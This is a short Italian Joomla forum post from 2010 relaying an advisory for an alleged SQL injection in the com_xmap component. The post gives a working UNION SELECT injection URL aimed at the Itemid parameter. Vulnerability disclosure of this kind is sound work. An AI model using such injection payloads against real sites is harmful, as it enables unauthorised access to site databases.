Joomla.it Forum

Non solo Joomla... => Sicurezza => : jeckodevelopment 13 Jul 2010, 10:54:10

: Joomla Component Xmap - com_xmap SQL Injection
: jeckodevelopment 13 Jul 2010, 10:54:10

Non si hanno maggiori informazioni riguardo questa presunta vulnerabilità di com_xmap.

:

#################################################################
# Application Info:
# Name: Joomla Component com_xmap
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION
SELECT 1,2,3,version(),5,6,7,8--
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################